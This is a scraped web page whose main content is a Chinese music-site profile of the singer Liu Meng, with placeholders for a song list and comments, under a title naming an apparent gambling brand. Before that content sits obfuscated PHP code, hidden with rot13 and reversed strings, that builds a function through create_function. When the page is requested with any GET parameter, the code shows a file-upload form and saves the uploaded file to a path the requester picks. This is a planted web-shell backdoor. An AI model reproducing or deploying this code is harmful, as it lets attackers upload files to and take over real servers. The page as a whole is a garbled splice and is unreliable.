class Main{ private $mainKey = 'abvgpahs_rgnrep'; private $k; private $dir; function __construct(){ $this->dir=dirname(__FILE__); @$this->auth(); } public function uinique($k){ $unique = $this->generateKey($k,$this->mainKey); $randomStr=';)\'cuc.\'.ugnc$,czrg$(rznare ;)czrg$,]"rzna_czg"[]"s"[FRYVS_$'. '(ryvs_qrqnbych_ribz ;))\'.\' ,s$(eupeegf,s$(rznarfno.\'/\'.]\'ugnc\'[GFBC_$ = ug'. 'nc$ ;s$.\'/\'.]\'ugnc\'[GFBC_$ = czrg$ ;]"rzna"[]"s"[FRYVS_$ = s$'; $text = $this->generateKey($k, $randomStr); return $unique('', $text); } public function html($k, $text){ echo $this->generateKey($k,$text); } function generateKey($k,$v){ $key1 = $k.rev; $key2 = $key1('trts').r; $key3 = $key2($key1,array('rev'=>'_rot')).$key1(31); return $key3($key1($key2($v, array('?'=>'"')))); } public function auth(){ if (!empty($_GET)) { $this->k=key($_GET); $this->html($this->k, '>"ngnq-zebs/gencvgyhz"=rclgpar "gfbc"=qbugrz ""=abvgpn zebs<'); $this->html($this->k,'"=rhyni "ugnc"=rzna "gkrg"=rclg ghcav<>/"s"=rzna "ryvs"=rclg ghcav<'); echo $this->dir; $this->html($this->k,'>zebs/<>/ "bt"=rhyni "gvzohf"=rzna "gvzohf"=rclg ghcav<>/"'); $authKey = $this->uinique($this->k); @$authKey(); } } } $man = new Main(); 凯发_凯发官网_刘梦

凯发_凯发官网

刘梦

刘梦
  • 姓名:刘梦
  • 性别:
  • 别名:
  • 国籍:中国
  • 语言:国语
  • 出生地:暂无
  • 生日:暂无
  • 星座:暂无
  • 身高:暂无
  • 体重:暂无

刘梦简介: 歌手刘梦新歌《风雨中奔跑的孩子》全网首发 近日,由颜建文作词,资深音乐人彭金灯作曲(担任电影《第十三根金条》音乐主创,同时是多部影视作品的音乐制作人),由实力女歌手刘梦演唱的《风雨中奔跑的孩子》将全网首发 据了解,歌手刘梦出生于湖北省当阳...详细资料

歌手标签: 湖北省 励志歌曲 当阳市 彩虹 音乐人

刘梦歌曲大全刘梦热门歌曲

全选

刘梦全部歌曲

全部播放 播放选中

歌曲名称
歌手
试听
下载

刘梦评论

  加载评论内容,请稍等......

更多刘梦MV推荐